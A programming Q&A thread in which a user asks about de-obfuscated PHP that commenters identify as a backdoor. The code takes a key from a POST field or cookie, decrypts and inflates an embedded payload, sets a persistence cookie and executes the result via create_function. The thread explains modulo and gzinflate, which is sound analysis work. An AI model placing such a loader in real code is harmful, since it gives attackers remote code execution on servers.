# Encrypted php code

Tags: php, base64, deobfuscation

### Issue

I have some PHP code that I've been decrypting (de-obfuscating) for 2 hours. I finally got it converted back into readable code, but I still have some issues understanding the algorithm used here, because of lack of knowledge about some things in the code below.

### Code

```
<?php

$posted = isset($_POST['posted']) ? $_POST['posted'] : (isset($_COOKIE['posted']) ? $_COOKIE['posted'] : NULL);
if ($posted!==NULL) {
    $posted= md5($posted) . substr(md5(strrev($posted)), 0, strlen($posted));
    for ($counter=0; $counter < 15324; $counter++)    {
        $idk[$counter] = chr((ord($idk[$counter]) - ord($posted[$counter])) % 256);
        $posted.=$idk[$counter];
    }

    if($idk = @gzinflate($idk)) {
        if (isset($_POST['posted']))
            @setcookie('posted', $_POST['posted']);
        $counter = create_function('', $idk);
        unset($idk, $posted);
        $counter();
    }
}
```

The `$idk` variable is already a value that contains a long string that's being base64 decoded.

### What I Don't Understand

I understand almost all of the code, but I don't get what `% 256` does in here and also I don't know what `gzinflate()` does.

Comment: It's a malicious backdoor. Don't spend all day investigating it; restore from backup, patch the way they got in, and move on.

Answer (score 3, accepted):

So, [`gzinflate()`](https://secure.php.net/manual/en/function.gzinflate.php) un-compresses input data that is compressed with the `zlib DEFLATE` algorithm. The corresponding function to *compress* or *deflate* an uncompressed string is called [`gzdeflate()`](https://secure.php.net/manual/en/function.gzdeflate.php), and it's manual page provides a bit more information:

> This function compresses the given string using the DEFLATE data format.
>
> For details on the DEFLATE compression algorithm see the document "[DEFLATE Compressed Data Format Specification version 1.3](http://www.faqs.org/rfcs/rfc1951)" (RFC 1951). Sparing a few details, this is similar to compressing a file using `gzip myfile.txt` on the Linux command line, which would create the compressed file `myfile.txt.gz`. In short, this is uncompressing compressed data assigned to `$idk`.

`$variable % 256` returns the remainder of dividing `$variable` by `256`. If I set `$variable` to `258`, `$variable % 256` would be `2`. This is often used when you want to see if a number is cleanly-divisible by another number. If I wanted to show a status-update every `100` times of a loop, for example, I might do:

```
<?php

for ($i = 1; $i <= 1000; ++$i)
{
    // Do something on each loop.

    if (($i % 100) == 0)
    {
        echo sprintf("Loop %d of 1000; %d percent complete.\n", $i, $i / 1000 * 100);
    }
}
```

But there are obviously many other uses.

As far as helping you figure out what exactly this source code does, I would recommend going through it step-by-step with real input and seeing what happens after each step. It will be hard for me to figure out much more about what it's doing without a lot more context.

Comment: They do the % 256 because they're converting the value to a char, which is 1 byte wide. They could as well have used & 255

Comment: Thank you that was helpful , i just figured out that the point of all this code is the last function , which injects a "malicious" cookie i guess .